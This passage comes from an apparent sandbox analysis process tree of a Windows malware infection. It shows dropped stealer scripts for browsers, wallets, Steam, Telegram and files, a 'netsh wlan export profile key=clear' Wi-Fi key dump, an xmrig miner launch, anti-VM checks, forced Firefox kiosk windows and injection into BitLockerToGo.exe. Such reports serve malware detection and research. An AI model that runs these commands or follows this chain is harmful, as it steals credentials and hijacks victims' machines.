                                                    "C:\Users\Admin\Documents\UnRAR.exe" x -y "C:\Users\Admin\Documents\7.rar" "C:\Users\Admin\Documents\"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:5312
                                                  • C:\Users\Admin\Documents\python.exe
                                                    "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\tokensdis.py"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:5536
                                                  • C:\Users\Admin\Documents\python.exe
                                                    "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\browsers.py"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:4572
                                                  • C:\Users\Admin\Documents\python.exe
                                                    "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\wallets.py"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:5364
                                                  • C:\Users\Admin\Documents\python.exe
                                                    "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\firefox.py"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:6988
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      7⤵
                                                        PID:6080
                                                    • C:\Users\Admin\Documents\python.exe
                                                      "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\firefoxex.py"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:2552
                                                    • C:\Users\Admin\Documents\python.exe
                                                      "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\steam.py"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:1428
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        7⤵
                                                          PID:4296
                                                      • C:\Users\Admin\Documents\python.exe
                                                        "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\info.py"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:7112
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "ver"
                                                          7⤵
                                                            PID:5892
                                                        • C:\Users\Admin\Documents\python.exe
                                                          "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\screen.py"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:4368
                                                        • C:\Users\Admin\Documents\python.exe
                                                          "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\wifi.py"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:6388
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "whoami"
                                                            7⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6092
                                                            • C:\Windows\SysWOW64\whoami.exe
                                                              whoami
                                                              8⤵
                                                                PID:6996
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "netsh wlan export profile key=clear"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:916
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh wlan export profile key=clear
                                                                8⤵
                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                PID:1060
                                                          • C:\Users\Admin\Documents\python.exe
                                                            "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\FileGrabber.py"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:5176
                                                          • C:\Users\Admin\Documents\python.exe
                                                            "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\telegr2am.py"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:7156
                                                          • C:\Users\Admin\Documents\python.exe
                                                            "C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\py.py"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:5392
                                                        • C:\Users\Admin\AppData\Local\Temp\nonifm.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\nonifm.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:6980
                                                        • C:\Users\Admin\AppData\Local\Temp\fmsdbf.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\fmsdbf.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:960
                                                          • C:\Users\Admin\Documents\UnRAR.exe
                                                            "C:\Users\Admin\Documents\UnRAR.exe" x -y "C:\Users\Admin\Documents\m.rar" "C:\Users\Admin\Documents\"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:6200
                                                          • C:\Users\Admin\Documents\xmrig.exe
                                                            "C:\Users\Admin\Documents\\xmrig.exe" "C:\Users\Admin\Documents\\--config config.json"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:7104
                                                      • C:\Users\Admin\AppData\Local\Temp\1000308001\be6791eece.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1000308001\be6791eece.exe"
                                                        4⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Loads dropped DLL
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Checks processor information in registry
                                                        PID:1912
                                                      • C:\Users\Admin\AppData\Local\Temp\1000309001\d677ac701a.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1000309001\d677ac701a.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:4932
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                          5⤵
                                                            PID:2576
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                              6⤵
                                                              • Checks processor information in registry
                                                              • Modifies registry class
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:424
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="424.0.182033850\421692258" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1488 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d3f58b4-e78b-49b9-867d-3353aa66f57f} 424 "\\.\pipe\gecko-crash-server-pipe.424" 1700 25d640d8b58 gpu
                                                                7⤵
                                                                  PID:3624
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="424.1.217169709\1859057948" -parentBuildID 20221007134813 -prefsHandle 2144 -prefMapHandle 2140 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c830eb4c-6aee-4a82-814f-ce1a9861c673} 424 "\\.\pipe\gecko-crash-server-pipe.424" 2172 25d63be5058 socket
                                                                  7⤵
                                                                    PID:1068
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="424.2.844914565\2120741918" -childID 1 -isForBrowser -prefsHandle 2564 -prefMapHandle 2432 -prefsLen 21646 -prefMapSize 233444 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d77fa7c-452a-46a0-b3b1-6ac83a256ed7} 424 "\\.\pipe\gecko-crash-server-pipe.424" 2424 25d6405fb58 tab
                                                                    7⤵
                                                                      PID:3776
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="424.3.1690234595\1457795131" -childID 2 -isForBrowser -prefsHandle 3464 -prefMapHandle 3460 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7804017-956d-43b4-9768-e8b9ca7e2653} 424 "\\.\pipe\gecko-crash-server-pipe.424" 3476 25d6976fb58 tab
                                                                      7⤵
                                                                        PID:5188
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="424.4.1413888573\282016056" -childID 3 -isForBrowser -prefsHandle 4776 -prefMapHandle 4760 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d6817f4-6584-4e13-ba0d-5b3ccaf32e99} 424 "\\.\pipe\gecko-crash-server-pipe.424" 4828 25d6b508258 tab
                                                                        7⤵
                                                                          PID:5244
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="424.5.1193163485\454869673" -childID 4 -isForBrowser -prefsHandle 4964 -prefMapHandle 4968 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ad127e7-cc2a-4f90-88b7-b3daf1dc7726} 424 "\\.\pipe\gecko-crash-server-pipe.424" 4956 25d6b607258 tab
                                                                          7⤵
                                                                            PID:5252
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="424.6.68035200\657647299" -childID 5 -isForBrowser -prefsHandle 5168 -prefMapHandle 4828 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {74b68c7c-710d-4b69-98ad-8d9a7918a33c} 424 "\\.\pipe\gecko-crash-server-pipe.424" 5156 25d6b609958 tab
                                                                            7⤵
                                                                              PID:5276
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                          5⤵
                                                                            PID:6692
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                              6⤵
                                                                              • Checks processor information in registry
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:6760
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6760.0.1032955552\2106222972" -parentBuildID 20221007134813 -prefsHandle 1628 -prefMapHandle 1616 -prefsLen 21193 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {86795906-ce1e-46ad-9728-e4889ee8f3e6} 6760 "\\.\pipe\gecko-crash-server-pipe.6760" 1704 1956f2d7758 gpu
                                                                                7⤵
                                                                                  PID:4068
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6760.1.745630433\1302824797" -parentBuildID 20221007134813 -prefsHandle 2148 -prefMapHandle 2144 -prefsLen 22054 -prefMapSize 233496 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc467a73-a6f1-4a1e-8243-98d19eb592c0} 6760 "\\.\pipe\gecko-crash-server-pipe.6760" 2160 1955d9dbb58 socket
                                                                                  7⤵
                                                                                    PID:6104
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                5⤵
                                                                                  PID:6248
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                    6⤵
                                                                                    • Checks processor information in registry
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:3752
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3752.0.1568532268\106973806" -parentBuildID 20221007134813 -prefsHandle 1512 -prefMapHandle 1500 -prefsLen 21273 -prefMapSize 233608 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9e33b84-aa7f-492c-a81e-94b42872de43} 3752 "\\.\pipe\gecko-crash-server-pipe.3752" 1628 246525f7b58 gpu
                                                                                      7⤵
                                                                                        PID:5516
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3752.1.1969844137\840908400" -parentBuildID 20221007134813 -prefsHandle 2064 -prefMapHandle 2060 -prefsLen 22134 -prefMapSize 233608 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca98abf4-14b5-41bf-b0a8-44487e2fa006} 3752 "\\.\pipe\gecko-crash-server-pipe.3752" 2076 24651ad9258 socket
                                                                                        7⤵
                                                                                          PID:2768
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3752.2.1340882407\843213993" -childID 1 -isForBrowser -prefsHandle 2824 -prefMapHandle 2532 -prefsLen 22237 -prefMapSize 233608 -jsInitHandle 876 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ba76a21-c8d8-46ab-8ce7-a1205b5e541c} 3752 "\\.\pipe\gecko-crash-server-pipe.3752" 2652 24656328858 tab
                                                                                          7⤵
                                                                                            PID:5432
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3752.3.893018085\955940476" -childID 2 -isForBrowser -prefsHandle 3340 -prefMapHandle 2124 -prefsLen 26578 -prefMapSize 233608 -jsInitHandle 876 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1d75265-f1cc-4bdc-b74f-d8c482b9ea3d} 3752 "\\.\pipe\gecko-crash-server-pipe.3752" 3384 246573f2558 tab
                                                                                            7⤵
                                                                                              PID:2012
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3752.4.1989660309\1261643234" -childID 3 -isForBrowser -prefsHandle 4408 -prefMapHandle 4292 -prefsLen 26578 -prefMapSize 233608 -jsInitHandle 876 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac582902-3153-4fc9-8e43-a74d20484efa} 3752 "\\.\pipe\gecko-crash-server-pipe.3752" 4416 24659ec7a58 tab
                                                                                              7⤵
                                                                                                PID:4832
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3752.5.1816886971\1514321136" -childID 4 -isForBrowser -prefsHandle 4288 -prefMapHandle 4436 -prefsLen 26578 -prefMapSize 233608 -jsInitHandle 876 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8457837b-1da5-4e02-800f-a484af8402ba} 3752 "\\.\pipe\gecko-crash-server-pipe.3752" 4552 24659ec8058 tab
                                                                                                7⤵
                                                                                                  PID:864
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3752.6.735872664\585986220" -childID 5 -isForBrowser -prefsHandle 4732 -prefMapHandle 4736 -prefsLen 26578 -prefMapSize 233608 -jsInitHandle 876 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {596470d6-2dca-40eb-abb6-7c847a72c55b} 3752 "\\.\pipe\gecko-crash-server-pipe.3752" 4724 2465a715d58 tab
                                                                                                  7⤵
                                                                                                    PID:5740
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                5⤵
                                                                                                  PID:6344
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                    6⤵
                                                                                                      PID:6284
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                    5⤵
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5628
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5628.0.523228222\1984776473" -parentBuildID 20221007134813 -prefsHandle 1580 -prefMapHandle 1568 -prefsLen 21457 -prefMapSize 233696 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eba606f5-53e5-4504-a71d-dd8421bb1583} 5628 "\\.\pipe\gecko-crash-server-pipe.5628" 1672 2b89c369858 gpu
                                                                                                      6⤵
                                                                                                        PID:6588
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5628.1.770008107\26359844" -parentBuildID 20221007134813 -prefsHandle 2080 -prefMapHandle 2076 -prefsLen 22318 -prefMapSize 233696 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1336a020-91fd-4d9b-ac2a-a290d8700ca3} 5628 "\\.\pipe\gecko-crash-server-pipe.5628" 2108 2b89b9dd858 socket
                                                                                                        6⤵
                                                                                                          PID:6844
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5628.2.1092986298\870371871" -childID 1 -isForBrowser -prefsHandle 2472 -prefMapHandle 2624 -prefsLen 22421 -prefMapSize 233696 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85312d84-5c03-48da-88be-7def2faf0a8a} 5628 "\\.\pipe\gecko-crash-server-pipe.5628" 2696 2b89ff4a958 tab
                                                                                                          6⤵
                                                                                                            PID:2140
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5628.3.808989149\1773327480" -childID 2 -isForBrowser -prefsHandle 3368 -prefMapHandle 1168 -prefsLen 26714 -prefMapSize 233696 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab6ec349-ecab-4d57-92da-f3292d4f9900} 5628 "\\.\pipe\gecko-crash-server-pipe.5628" 3380 2b88a762b58 tab
                                                                                                            6⤵
                                                                                                              PID:5256
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5628.4.1098608305\1123716946" -childID 3 -isForBrowser -prefsHandle 3704 -prefMapHandle 3700 -prefsLen 26829 -prefMapSize 233696 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9872ff5c-2a2a-4fc7-9b64-8d23f3a25c66} 5628 "\\.\pipe\gecko-crash-server-pipe.5628" 3716 2b88a766558 tab
                                                                                                              6⤵
                                                                                                                PID:1300
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5628.5.1396192591\275197583" -childID 4 -isForBrowser -prefsHandle 4680 -prefMapHandle 4676 -prefsLen 26829 -prefMapSize 233696 -jsInitHandle 1116 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f6a59e8-e864-4ee6-a1c0-1f9b118ad732} 5628 "\\.\pipe\gecko-crash-server-pipe.5628" 4692 2b8a3e72c58 tab
                                                                                                                6⤵
                                                                                                                  PID:3612
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                                5⤵
                                                                                                                • Checks processor information in registry
                                                                                                                PID:5852
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                                5⤵
                                                                                                                  PID:3672
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                                  5⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:5648
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                                  5⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:5424
                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5424.0.746470971\887364223" -parentBuildID 20221007134813 -prefsHandle 1612 -prefMapHandle 1580 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97d66648-d0a0-442c-86a9-df720a11b923} 5424 "\\.\pipe\gecko-crash-server-pipe.5424" 1696 2173f3f9458 gpu
                                                                                                                    6⤵
                                                                                                                      PID:4972
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5424.1.52023094\776963686" -parentBuildID 20221007134813 -prefsHandle 1888 -prefMapHandle 1884 -prefsLen 17601 -prefMapSize 230321 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53de0f3c-ead1-4a53-bd4c-66892b0b20cd} 5424 "\\.\pipe\gecko-crash-server-pipe.5424" 1900 2173f848c58 socket
                                                                                                                      6⤵
                                                                                                                        PID:2144
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                                      5⤵
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:6136
                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6136.0.898909862\115647277" -parentBuildID 20221007134813 -prefsHandle 1596 -prefMapHandle 1264 -prefsLen 21616 -prefMapSize 233696 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1a0b721-477b-4ec5-9910-4ce6aa7e4ea9} 6136 "\\.\pipe\gecko-crash-server-pipe.6136" 1676 19591a36a58 gpu
                                                                                                                        6⤵
                                                                                                                          PID:6096
                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6136.1.471229190\1979103515" -parentBuildID 20221007134813 -prefsHandle 2080 -prefMapHandle 2076 -prefsLen 22477 -prefMapSize 233696 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ed41311-8272-4299-813c-482efa094c72} 6136 "\\.\pipe\gecko-crash-server-pipe.6136" 2092 19590df1858 socket
                                                                                                                          6⤵
                                                                                                                            PID:6284
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6136.2.1642756836\1283344194" -childID 1 -isForBrowser -prefsHandle 2392 -prefMapHandle 2640 -prefsLen 22580 -prefMapSize 233696 -jsInitHandle 1224 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {75e1e167-1f92-47f8-b5b8-3408ce8426a5} 6136 "\\.\pipe\gecko-crash-server-pipe.6136" 2616 19595344d58 tab
                                                                                                                            6⤵
                                                                                                                              PID:5364
                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6136.3.711203151\1526710976" -childID 2 -isForBrowser -prefsHandle 3376 -prefMapHandle 3372 -prefsLen 26829 -prefMapSize 233696 -jsInitHandle 1224 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fca4574-ce6a-41cc-8361-50eeedd2e10e} 6136 "\\.\pipe\gecko-crash-server-pipe.6136" 3388 195fb062858 tab
                                                                                                                              6⤵
                                                                                                                                PID:1044
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6136.4.1005194191\1373343858" -childID 3 -isForBrowser -prefsHandle 3660 -prefMapHandle 3632 -prefsLen 26829 -prefMapSize 233696 -jsInitHandle 1224 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd15410d-cfe7-48ca-86db-0daa78570fd7} 6136 "\\.\pipe\gecko-crash-server-pipe.6136" 3672 195983d2d58 tab
                                                                                                                                6⤵
                                                                                                                                  PID:7024
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6136.5.768995668\794586630" -childID 4 -isForBrowser -prefsHandle 4812 -prefMapHandle 4808 -prefsLen 26829 -prefMapSize 233696 -jsInitHandle 1224 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e7ed3a7-8c4c-4ee2-bd65-dc7443f9c5a0} 6136 "\\.\pipe\gecko-crash-server-pipe.6136" 4824 19598ea6758 tab
                                                                                                                                  6⤵
                                                                                                                                    PID:6292
                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6136.6.1239649012\423909527" -childID 5 -isForBrowser -prefsHandle 2136 -prefMapHandle 4988 -prefsLen 26829 -prefMapSize 233696 -jsInitHandle 1224 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b55c0f63-a935-4280-a7c7-be82be66f473} 6136 "\\.\pipe\gecko-crash-server-pipe.6136" 1516 19596055458 tab
                                                                                                                                    6⤵
                                                                                                                                      PID:7028
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6136.7.112573465\558418554" -childID 6 -isForBrowser -prefsHandle 5228 -prefMapHandle 5224 -prefsLen 26938 -prefMapSize 233696 -jsInitHandle 1224 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0764d7d3-3308-418e-90a6-606895086175} 6136 "\\.\pipe\gecko-crash-server-pipe.6136" 5196 19596744b58 tab
                                                                                                                                      6⤵
                                                                                                                                        PID:6788
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                                                      5⤵
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      PID:3212
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                                                      5⤵
                                                                                                                                        PID:6484
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                                                                        5⤵
                                                                                                                                          PID:6884
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
                                                                                                                                        4⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:2552
                                                                                                                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
